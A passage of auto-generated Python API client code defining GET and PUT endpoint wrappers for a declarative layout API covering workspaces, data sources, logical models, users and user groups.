kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
return self.call_with_http_info(**kwargs)
self.get_analytics_model = _Endpoint(
settings={
'response_type': (DeclarativeAnalytics,),
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/analyticsModel',
'operation_id': 'get_analytics_model',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'workspace_id',
],
'required': [
'workspace_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_analytics_model
)
def __get_data_sources_layout(
self,
**kwargs
):
"""Get all data sources # noqa: E501
Retrieve all data sources including related physical model. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_data_sources_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeDataSources
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_data_sources_layout = _Endpoint(
settings={
'response_type': (DeclarativeDataSources,),
'auth': [],
'endpoint_path': '/api/layout/dataSources',
'operation_id': 'get_data_sources_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_data_sources_layout
)
def __get_logical_model(
self,
workspace_id,
**kwargs
):
"""Get logical model # noqa: E501
Retrieve current logical model of the workspace in declarative form. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logical_model(workspace_id, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeModel
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
return self.call_with_http_info(**kwargs)
self.get_logical_model = _Endpoint(
settings={
'response_type': (DeclarativeModel,),
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}/logicalModel',
'operation_id': 'get_logical_model',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'workspace_id',
],
'required': [
'workspace_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_logical_model
)
def __get_organization_layout(
self,
**kwargs
):
"""Get organization layout # noqa: E501
Retrieve complete layout of organization, workspaces, user-groups, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_organization_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeOrganization
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_organization_layout = _Endpoint(
settings={
'response_type': (DeclarativeOrganization,),
'auth': [],
'endpoint_path': '/api/layout/organization',
'operation_id': 'get_organization_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_organization_layout
)
def __get_user_groups_layout(
self,
**kwargs
):
"""Get all users # noqa: E501
Retrieve all user-groups eventually with parent group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_groups_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeUserGroups
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_user_groups_layout = _Endpoint(
settings={
'response_type': (DeclarativeUserGroups,),
'auth': [],
'endpoint_path': '/api/layout/userGroups',
'operation_id': 'get_user_groups_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_user_groups_layout
)
def __get_users_layout(
self,
**kwargs
):
"""Get all users # noqa: E501
Retrieve all users including authentication properties. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeUsers
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_users_layout = _Endpoint(
settings={
'response_type': (DeclarativeUsers,),
'auth': [],
'endpoint_path': '/api/layout/users',
'operation_id': 'get_users_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_users_layout
)
def __get_users_user_groups_layout(
self,
**kwargs
):
"""Get all users and user groups # noqa: E501
Retrieve all users and user groups with theirs properties. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_user_groups_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeUsersUserGroups
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_users_user_groups_layout = _Endpoint(
settings={
'response_type': (DeclarativeUsersUserGroups,),
'auth': [],
'endpoint_path': '/api/layout/usersAndUserGroups',
'operation_id': 'get_users_user_groups_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_users_user_groups_layout
)
def __get_workspace_data_filters_layout(
self,
**kwargs
):
"""Get workspace data filters for all workspaces # noqa: E501
Retrieve all workspaces and related workspace data filters (and their settings / values). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workspace_data_filters_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeWorkspaceDataFilters
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_workspace_data_filters_layout = _Endpoint(
settings={
'response_type': (DeclarativeWorkspaceDataFilters,),
'auth': [],
'endpoint_path': '/api/layout/workspaceDataFilters',
'operation_id': 'get_workspace_data_filters_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_workspace_data_filters_layout
)
def __get_workspace_layout(
self,
workspace_id,
**kwargs
):
"""Get workspace layout # noqa: E501
Retrieve current model of the workspace in declarative form. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workspace_layout(workspace_id, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeWorkspaceModel
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
return self.call_with_http_info(**kwargs)
self.get_workspace_layout = _Endpoint(
settings={
'response_type': (DeclarativeWorkspaceModel,),
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}',
'operation_id': 'get_workspace_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'workspace_id',
],
'required': [
'workspace_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'workspace_id':
(str,),
},
'attribute_map': {
'workspace_id': 'workspaceId',
},
'location_map': {
'workspace_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_workspace_layout
)
def __get_workspaces_layout(
self,
**kwargs
):
"""Get all workspaces layout # noqa: E501
Gets complete layout of workspaces, their hierarchy, models. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workspaces_layout(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeWorkspaces
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_workspaces_layout = _Endpoint(
settings={
'response_type': (DeclarativeWorkspaces,),
'auth': [],
'endpoint_path': '/api/layout/workspaces',
'operation_id': 'get_workspaces_layout',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'*/*'
],
'content_type': [],
},
api_client=api_client,
callable=__get_workspaces_layout
)
def __put_data_sources_layout(
self,
declarative_users_user_groups,
**kwargs
):
"""Put all data sources # noqa: E501
Set all data sources including related physical model. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_data_sources_layout(declarative_users_user_groups, async_req=True)
>>> result = thread.get()
Args:
declarative_users_user_groups (DeclarativeUsersUserGroups):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_users_user_groups'] = \
declarative_users_user_groups
return self.call_with_http_info(**kwargs)
self.put_data_sources_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/usersAndUserGroups',
'operation_id': 'put_data_sources_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_users_user_groups',
],
'required': [
'declarative_users_user_groups',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_users_user_groups':
(DeclarativeUsersUserGroups,),
},
'attribute_map': {
},
'location_map': {
'declarative_users_user_groups': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_data_sources_layout
)
def __put_data_sources_layout1(
self,
declarative_data_sources,
**kwargs
):
"""Put all data sources # noqa: E501
Set all data sources including related physical model. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_data_sources_layout1(declarative_data_sources, async_req=True)
>>> result = thread.get()
Args:
declarative_data_sources (DeclarativeDataSources):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_data_sources'] = \
declarative_data_sources
return self.call_with_http_info(**kwargs)
self.put_data_sources_layout1 = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/dataSources',
'operation_id': 'put_data_sources_layout1',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_data_sources',
],
'required': [
'declarative_data_sources',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_data_sources':
(DeclarativeDataSources,),
},
'attribute_map': {
},
'location_map': {
'declarative_data_sources': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_data_sources_layout1
)
def __put_user_groups_layout(
self,
declarative_user_groups,
**kwargs
):
"""Put all user groups # noqa: E501
Define all user groups with their parents eventually. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_user_groups_layout(declarative_user_groups, async_req=True)
>>> result = thread.get()
Args:
declarative_user_groups (DeclarativeUserGroups):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_user_groups'] = \
declarative_user_groups
return self.call_with_http_info(**kwargs)
self.put_user_groups_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/userGroups',
'operation_id': 'put_user_groups_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_user_groups',
],
'required': [
'declarative_user_groups',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_user_groups':
(DeclarativeUserGroups,),
},
'attribute_map': {
},
'location_map': {
'declarative_user_groups': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_user_groups_layout
)
def __put_users_layout(
self,
declarative_users,
**kwargs
):
"""Put all users # noqa: E501
Set all users and their authentication properties. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_users_layout(declarative_users, async_req=True)
>>> result = thread.get()
Args:
declarative_users (DeclarativeUsers):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_users'] = \
declarative_users
return self.call_with_http_info(**kwargs)
self.put_users_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/users',
'operation_id': 'put_users_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_users',
],
'required': [
'declarative_users',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_users':
(DeclarativeUsers,),
},
'attribute_map': {
},
'location_map': {
'declarative_users': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__put_users_layout
)
def __put_workspace_layout(
self,
workspace_id,
declarative_workspace_model,
**kwargs
):
"""Set workspace layout # noqa: E501
Set complete layout of workspace, like model, ACLs, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_workspace_layout(workspace_id, declarative_workspace_model, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
declarative_workspace_model (DeclarativeWorkspaceModel):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['workspace_id'] = \
workspace_id
kwargs['declarative_workspace_model'] = \
declarative_workspace_model
return self.call_with_http_info(**kwargs)
self.put_workspace_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces/{workspaceId}',
'operation_id': 'put_workspace_layout',
'http_method': 'PUT',
'servers': None,
},
